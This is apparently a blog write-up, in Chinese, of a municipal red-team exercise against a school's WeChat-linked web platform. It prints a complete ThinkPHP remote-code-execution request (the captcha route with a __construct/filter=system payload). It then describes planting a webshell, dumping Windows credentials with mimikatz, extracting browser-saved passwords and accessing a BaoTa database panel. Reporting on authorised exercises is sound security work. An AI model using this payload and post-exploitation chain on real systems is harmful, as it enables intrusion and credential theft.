某市HW攻防演练部分总结

今年护网犹如生娃,十月怀胎,奶粉备好,突然晚产;去了医院,月嫂都请好了,又不生了需要推迟

image

0x01 前言

HW突然临时取消,听到原因差点没被吓到,真的扯,然后被拉去参加了某市组织的网络安全攻防演练,应该是自查吧。
拿到目标,大佬们都开动了,掏出自己神器就开始干。
由于太菜,挑软柿子捏,瞄准了某市某学校这个目标,开始简单的信息收集,子域名,端口,c端…..,其实想找后台的,根据经验来说,弱口令太多了。可惜没有发现,在等待收集结果的时候,开始对其公众号进行试探性地测试。

0x02 总攻

目标:某市某学校
突破口:公众号”某市某互动平台”->日常管理

image

发现这个居然是tp框架,最终理想结果当然是rce,访问index.php?s=captcha,返回验证码,直接上payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /****/index.php?s=captcha HTTP/1.1
Host: *****
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; MuMu Build/V417IR; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.100 Mobile Safari/537.36 MMWEBID/4428 MicroMessenger/7.0.17.1720(0x27001134) Process/tools WeChat/arm32 NetType/WIFI Language/zh_CN ABI/arm32
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=3i48ekanekc6jlj6i9pstl9r36
X-Requested-With: com.tencent.mm
Connection: close
Content-Length: 59

_method=__construct&filter[]=system&method=GET&get[]=whoami

看到结果的时候,心中一喜

image

admin权限,直接写shell,蚁剑连接
shell : http://ip/a.php

image

ping服务器获取出口IP:*.*.*.*

image

扫描发现,3389是开的,传个mimikatz,dump出密码

image

账号 Administraor
密码 *(密码过于敏感)
情况特殊,直接登陆即可,没有做其他的操作。
记录下基本信息:

1
2
3
4
系统:windows 2008 r2
杀软:360主机卫士 360杀毒 安全狗
三个网卡
工作组

一套流程形如流水,因为一个目标分值是死的,1w分,所以得速度越快越好,不然分值被其他队瓜分了。

幸好老天助我,这台机器似乎是管理机,打开浏览器,与细想状态一样,直接获取浏览器中存储的密码

image
image

巧的是找到了网站集群管理系统,可对管理的站点上传shell。

image

这都是拿分点啊,只不过感觉这分都是找出来的(毫无技术含量,我真菜),另外这是宝塔,通过IP:888/pma可以直接登录数据库

image

0x03 收尾

很菜,水了一篇文章,举办方禁止继续往下深入。
通过这次演练,让我明白了,只要队友牛逼,躺着也能起飞,收获巨大,学习了很多,感谢大佬们。

-------------本文结束&感谢您的阅读-------------